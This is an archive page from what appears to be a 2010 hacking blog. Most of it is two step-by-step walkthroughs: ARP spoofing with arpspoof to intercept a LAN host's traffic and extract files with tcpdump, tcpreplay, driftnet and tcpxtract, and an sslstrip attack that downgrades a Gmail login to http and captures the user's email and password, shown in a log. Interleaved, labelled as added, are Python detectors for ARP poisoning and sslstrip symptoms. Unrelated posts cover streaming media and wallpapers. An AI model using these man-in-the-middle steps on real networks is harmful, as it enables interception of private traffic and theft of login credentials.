mitm packet capturing & basic analysis

17 06 2010

We all know the difference between a hub & a switch (if not, this is not the blog for you). As most networks these days will be switched, it's no longer a case of plug in & dump packets. So here is the easy way to capture traffic from the network for investigation later. This works with wired or wireless. This is a combination of skillz from my SSLSTRIP post and the Image Extraction post.

Simply put, we use arpspoof to convince the gateway that we are the target, and the target that we are the gateway.

Target selection (our IP is 172.16.189.136, default gateway is 172.16.189.2):

root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:ab:b2:2c
          inet addr:172.16.189.136  Bcast:172.16.189.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:22 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3682 (3.6 KB)  TX bytes:1753 (1.7 KB)
          Interrupt:19 Base address:0x2000

root@bt:~# netstat -nr
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
172.16.189.0    0.0.0.0         255.255.255.0   U         0 0          0 eth0
0.0.0.0         172.16.189.2    0.0.0.0         UG        0 0          0 eth0

root@bt:~# nmap -sP 172.16.189.1-255

Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-17 21:10 EST
Nmap scan report for 172.16.189.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 172.16.189.2
Host is up (0.0015s latency).
MAC Address: 00:50:56:E5:F7:F0 (VMware)
Nmap scan report for 172.16.189.135
Host is up (0.00076s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap scan report for 172.16.189.136
Host is up.
Nmap scan report for 172.16.189.254
Host is up (0.00050s latency).
MAC Address: 00:50:56:F8:EC:20 (VMware)
Nmap done: 255 IP addresses (5 hosts up) scanned in 4.36 seconds
root@bt:~#

So we have a couple of other hosts there; we will use 172.16.189.135.

We want traffic from 172.16.189.135 to the gateway (internet) sent to us, and traffic from the gateway back to 172.16.189.135 also sent to us; we do that with the following arpspoof commands.

Windows host before arpspoof:

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-50-56-e5-f7-f0     dynamic

arpspoof commands to run on our backtrack box, not forgetting to enable IP forwarding first:

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward

root@bt:~# arpspoof -i eth0 -t 172.16.189.135 172.16.189.2
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c

root@bt:~# arpspoof -i eth0 -t 172.16.189.2 172.16.189.135
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c

and our Windows box?

C:\Documents and Settings\Administrator>arp -a

Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-0c-29-ab-b2-2c     dynamic
  172.16.189.136        00-0c-29-ab-b2-2c     dynamic
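
The two tells in that arp table (the gateway's MAC changing, and one MAC answering for more than one IP) are easy to check for from the defender's side. This is an added example, not code from the post; the ARP reply lines and the arp -a text are constructed in the formats shown above, and the "known-good" gateway binding is the one from the before snapshot.

```python
# Spot ARP poisoning from the two symptoms above: an IP (the gateway) changing
# MAC, and one MAC claiming more than one IP. Samples below are constructed.
import re
from collections import defaultdict

# Matches arpspoof's "arp reply X is-at Y" and tcpdump's "ARP, Reply X is-at Y".
ARP_REPLY = re.compile(r"arp,?\s+reply\s+(\d+\.\d+\.\d+\.\d+)\s+is-at\s+([0-9a-f:]+)", re.I)
ARP_TABLE_ROW = re.compile(r"(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{1,2}(?:[-:][0-9a-f]{1,2}){5})", re.I)

def normalise_mac(mac):
    """Lowercase, colon-separated, zero-padded: 0:c:29:9:4:71 -> 00:0c:29:09:04:71."""
    return ":".join(f"{int(o, 16):02x}" for o in mac.replace("-", ":").split(":"))

def detect_arp_spoof(lines, trusted=None):
    """Replay ARP reply lines against known-good bindings ({ip: mac}); return alerts."""
    seen = {ip: normalise_mac(mac) for ip, mac in (trusted or {}).items()}
    claims = defaultdict(set)  # mac -> IPs it has been seen answering for
    for ip, mac in seen.items():
        claims[mac].add(ip)
    alerts = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue
        ip, mac = m.group(1), normalise_mac(m.group(2))
        if ip in seen and seen[ip] != mac:
            alerts.append(f"{ip} changed from {seen[ip]} to {mac}")
        seen[ip] = mac
        claims[mac].add(ip)
        if len(claims[mac]) > 1 and (msg := f"{mac} claims {sorted(claims[mac])}") not in alerts:
            alerts.append(msg)
    return alerts

def duplicate_macs(arp_table_text):
    """Parse Windows 'arp -a' output (IP then MAC on a row); return MACs bound to >1 IP."""
    by_mac = defaultdict(set)
    for ip, mac in ARP_TABLE_ROW.findall(arp_table_text):
        by_mac[normalise_mac(mac)].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

# Constructed samples in the formats the post shows.
GATEWAY_BINDING = {"172.16.189.2": "00:50:56:e5:f7:f0"}   # learned before the attack
ARP_REPLIES = [
    "0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 172.16.189.2 is-at 0:c:29:ab:b2:2c",
    "0:c:29:ab:b2:2c 0:50:56:e5:f7:f0 0806 42: arp reply 172.16.189.135 is-at 0:c:29:ab:b2:2c",
]
WINDOWS_ARP_A = """Interface: 172.16.189.135 --- 0x2
  Internet Address      Physical Address      Type
  172.16.189.2          00-0c-29-ab-b2-2c     dynamic
  172.16.189.136        00-0c-29-ab-b2-2c     dynamic"""
```

A shared MAC is only a lead, not proof (VRRP gateways and multi-homed hosts do it legitimately), so treat the "changed" alert for the gateway as the stronger signal.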

and of course, kick off your tcpdump session (filtering out the ARP traffic generated by arpspoof):

root@bt:~# tcpdump -s0 -i eth0 not arp -w eth0capture-s0
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes

So, we have a shiny new file full of data goodness – what to do with it? There are several ways you can look at the data:
urlsnarf – prints http requests
driftnet – extracts files from the capture
tcpxtract – another extractor from captures **needs installation, but it got me the best results**

Set up the apps to listen on the local interface in separate windows, then feed your packets into that interface with tcpreplay.

root@bt:~# urlsnarf -i lo
urlsnarf: listening on lo [tcp port 80 or port 8080 or port 3128]

root@bt:~# driftnet -i lo
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-0.jpeg'
driftnet: saving `/tmp/driftnet-5VbG3g/driftnet-4c1a110b643c9869.jpeg' as `driftnet-1.jpeg'

root@bt:~# tcpreplay -i lo eth0capture-s0
sending out lo
processing file: eth0capture-s0
Actual: 18412 packets (15604605 bytes) sent in 105.88 seconds
Rated: 148490.3 bps, 1.13 Mbps/sec, 175.20 pps

Statistics for network device: lo
        Attempted packets:         18412
        Successful packets:        18412
        Failed packets:            0
        Retried packets (ENOBUFS): 0
        Retried packets (EAGAIN):  0


root@bt:~# apt-get install tcpxtract
root@bt:~# mkdir tcpxtract
root@bt:~# tcpxtract -f eth0capture-s0 -o tcpxtract/
Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000000.html
Found file of type "html" in session [207.46.170.10:20480 -> 172.16.189.135:7429], exporting to tcpxtract/00000001.html

There we go, we extracted some info from the packet capture. Next time I will cover a much nicer util to get our files out of the capture file.




internet killed the radio (and video) star

15 06 2010

I don't have Foxtel, mainly because of the 20 or 30 channels you have; once you've watched it for about a week you (well, I did) work out there is nothing to watch. Enter the modern marvel of the Internet: global media, instantly available to the masses. I have been trialling several sites & solutions.

XBMC – XBOX media centre – now no longer developed & maintained for the XBOX. That's right, the uber XBOX media centre is no longer for the XBOX – this is because of the underpowered hardware in the original XBOX. There is light at the end of the tunnel though – you can get XBMC for other platforms – Windows / OSX / Linux / AppleTV & also a live distro. This is a great media solution – possibly only trumped by the below:

Boxee – “Boxee is the best way to watch movies, TV shows and clips from the Internet on your TV. Basically, you install our free software on an affordable computer, like a Mac Mini or Acer Revo, and connect it to your TV with an HDMI or DVI cord (depending on the computer you use). To navigate Boxee from your couch, you can use an Apple Remote or one of several PC-remotes available.” – OK, official blurb out of the way: if you have access to a US based IP (VPN etc) this is one of the best ways I have found to discover internet based TV, Movie & Music services. Do yourself a favour, check the site (or at least the Intro Video), load up a copy & have a good go at it. This has replaced my XBOX with XBMC. I have a small form factor PC running Linux Mint (for its out of the box media support & plugin) with Boxee installed on it for media. It rocks.

TV & Movies
Some of these require a US IP address – several options here: use Google & have a look at VPN solutions, or do what I have done & get a VPS from Crucial Paradigm.

Hulu
TheWB
CastTV
Pandora
TVGorge
Grooveshark
YouTube
YouTube-Disco
Picrap





hakin9 magazine

14 06 2010

I'm glad to see this is now available online. It's been hard to get in Australia & at $15 or $20 a pop it adds up. Jump here & download the issues – some great articles to be had, from n00b to l33t:
hakin9.org magazine





image extraction from packet capture

13 06 2010

Some very interesting tools used in this vid, showing that you don't need to be watching live streams to catch interesting fish 😀

Great video on using ettercap to capture traffic & a selection of tools to extract data (mainly images) from the traffic.

ettercap
foremost
tcpxtract (can be installed from the backtrack repos)
tcpreplay
urlsnarf / driftnet –> part of the dsniff suite

Linked from the following post from “adaywithtape”





sensational wallpapers

13 06 2010

I have been looking around a few websites, and stumbled upon this one for wallpapers – wallbase.net. Some AMAZING work in here, massive credit to all the creators & owners of this artwork – I am merely an impressed visitor.





hacking a computer – movie style

11 06 2010

http://gizmodo.com/5559058/how-to-hack-a-computer-action-movie-edition





capturing credentials with sslstrip

11 06 2010

You may or may not have seen this tool before, there are plenty of videos around that show you how to use it – let me add one more “howto” & show you my fun with it.

Scenario:

You are attached to the same network (sorry kids, not a remote vector) as the victim with a backtrack machine (doesn't need to be backtrack, but I use it regularly) and have downloaded sslstrip.

Get it: download & unpack

root@bt:~/scripts/sslstrip# wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
root@bt:~/scripts/sslstrip# tar zxvf sslstrip-0.7.tar.gz

Setup: you need to enable IP forwarding in Linux & set up a redirect for all port 80 traffic to port 10000 (the default sslstrip port). Run sslstrip & get it to write the captured credentials out to a file with -w.

root@bt:~/scripts/sslstrip# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~/scripts/sslstrip# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
root@bt:~/scripts/sslstrip/sslstrip-0.7# python sslstrip.py -f -w sslcreds-captured

Once this is done we are nearly there – now to get users to send their traffic through your machine on the way to the gateway. In this case the target is 192.168.0.141 & the real gateway is 192.168.0.254.

root@bt:~# arpspoof -i eth0 -t 192.168.0.141 192.168.0.254
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c
0:c:29:ab:b2:2c 0:c:29:9:4:71 0806 42: arp reply 192.168.0.254 is-at 0:c:29:ab:b2:2c

Cool – so now what … what have we actually done … let's deconstruct it a little:

Firstly, Linux has been configured to forward packets, and we set up an iptables rule to redirect all port 80 traffic to sslstrip, which we ran on the default port 10000, writing out to the log sslcreds-captured.

Next was to get the target to send their traffic to us instead of the gateway: using arpspoof we are telling our target that the gateway address of 192.168.0.254 is actually our NIC.

Our target machine's NIC is 00-0C-29-09-04-71, which arpspoof automatically gathered when we ran it.

We could have easily gathered this from the backtrack machine:

root@bt:~# nmap -sP 192.168.0.141

Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-10 22:18 EST
Nmap scan report for 192.168.0.141
Host is up (0.00049s latency).
MAC Address: 00:0C:29:09:04:71 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

but to show the actual client config, here is the Windows ipconfig /all output:

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix  . :
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter

Physical Address. . . . . . . . . : 00-0C-29-09-04-71
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.0.141
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.254
DHCP Server . . . . . . . . . . . : 192.168.0.254
DNS Servers . . . . . . . . . . . : 8.8.8.8
Lease Obtained. . . . . . . . . . : Thursday, 10 June 2010 8:54:17 PM
Lease Expires . . . . . . . . . . : Friday, 11 June 2010 8:54:17 PM

So, what does the ARP spoofing look like on the target?
Before:

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.0.141 --- 0x2
Internet Address      Physical Address      Type
192.168.0.254         00-02-b3-a9-a5-13     dynamic

After:

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.0.141 --- 0x2
Internet Address      Physical Address      Type
192.168.0.254         00-0c-29-ab-b2-2c     dynamic

Notice the original gateway MAC address 00-02-b3-a9-a5-13 has been replaced by our attacker MAC 00-0c-29-ab-b2-2c.

User experience:
We will use GMAIL as an example, but many, many web pages use http for the body & simply use https for the form post, which this script takes advantage of.

So our user wants to log in to their GMAIL account, so they fire up the browser & type in http://www.gmail.com

Normal GMAIL page:

***Notice the url is https://www.google.com/accounts/……… & there is a padlock on the right hand side***

sslstrip GMAIL page:

***Notice the url is actually http://www.google.com/accounts/……… & there is a padlock on the left hand side; this padlock is actually a favicon of a padlock added by sslstrip to trick those not paying attention***

This is the only subtle difference the user sees: sslstrip detects the https links in the pages requested & rewrites them as http before passing them back to the client. From sslstrip to the server it is still https, so GMAIL is happy it's an SSL connection, & the target is happy as he sees the identical logon page he is used to seeing, only delivered as an http page, not https. As we are not trying to serve an https page back to the user, there are zero certificate popups etc.

So he logs in, gets his mail & lives happily ever after.
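
The symptoms just described (login page and form action arriving over http, the padlock favicon swapped in, and no Strict-Transport-Security header, which is the control that stops a browser following the downgrade on later visits) can be checked on the client side. This is an added example, not code from the post or from sslstrip; www.example.com, the headers and the HTML are constructed samples, nothing is fetched from the network.

```python
# Audit a fetched login page for the sslstrip symptoms described above: page and form
# action downgraded to http, favicon swapped, and no HSTS header. Samples are constructed.
from html.parser import HTMLParser

class FormCollector(HTMLParser):
    """Collect <form action> targets and <link rel=icon> hrefs from an HTML document."""
    def __init__(self):
        super().__init__()
        self.actions, self.icons = [], []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"])
        elif tag == "link" and "icon" in (a.get("rel") or "").lower() and a.get("href"):
            self.icons.append(a["href"])

def parse_headers(raw):
    """'Name: value' lines (after the status line) -> lowercase-keyed dict."""
    hdrs = {}
    for line in raw.strip().splitlines()[1:]:
        name, _, value = line.partition(":")
        hdrs[name.strip().lower()] = value.strip()
    return hdrs

def audit_login_page(url, raw_headers, html, expected_icon=None):
    """Return findings for a page that should be the TLS-protected login step."""
    hdrs, p = parse_headers(raw_headers), FormCollector()
    p.feed(html)
    findings = []
    if url.startswith("http://"):
        findings.append(f"login page loaded over plaintext: {url}")
    for action in p.actions:
        if action.startswith("http://"):
            findings.append(f"form posts credentials over plaintext: {action}")
    if "strict-transport-security" not in hdrs:
        findings.append("no Strict-Transport-Security header")
    if expected_icon and p.icons and p.icons[0] != expected_icon:
        findings.append(f"favicon replaced: {p.icons[0]} (padlock-lookalike trick)")
    return findings

# Constructed: what the real site serves, and what a victim behind sslstrip receives.
GOOD_URL = "https://www.example.com/accounts/ServiceLogin"
GOOD_HEADERS = "HTTP/1.1 200 OK\nStrict-Transport-Security: max-age=31536000\nContent-Type: text/html"
GOOD_HTML = ('<link rel="shortcut icon" href="https://www.example.com/favicon.ico">'
             '<form action="https://www.example.com/accounts/ServiceLoginAuth" method="post">'
             '<input name="Email"><input name="Passwd" type="password"></form>')
STRIPPED_URL = GOOD_URL.replace("https://", "http://")
STRIPPED_HEADERS = "HTTP/1.1 200 OK\nContent-Type: text/html"      # proxy drops HSTS
STRIPPED_HTML = GOOD_HTML.replace("https://", "http://").replace(
    "http://www.example.com/favicon.ico", "http://www.example.com/lock-favicon.ico")
```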

THE FUN BIT:

Remember we were writing to an output file:

root@bt:~/scripts/sslstrip/sslstrip-0.7# cat sslcreds-captured
2010-06-10 22:07:25,992 SECURE POST Data (www.google.com):
ltmpl=default&ltmplcache=2&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3F&service=mail&rm=false&dsh=3964009503580918215&ltmpl=default&ltmpl=default&scc=1&GALX=EN7ZeXSvfzo&Email=johndoe@gmail.com&Passwd=J0hN%24_Sup3Rl33tP@ssw0rd&rmShown=1&signIn=Sign+in&asts=

The most interesting bits of that are:
Email=johndoe@gmail.com
Passwd=J0hN%24_Sup3Rl33tP@ssw0rd
*note: the %24 is the URL-encoded hex value for the dollar ‘$’ symbol
Because johndoe is super secure & has chosen a long password he must be safe …. except for that one time he connected at the wrong internet cafe ……

GaMe-OvEr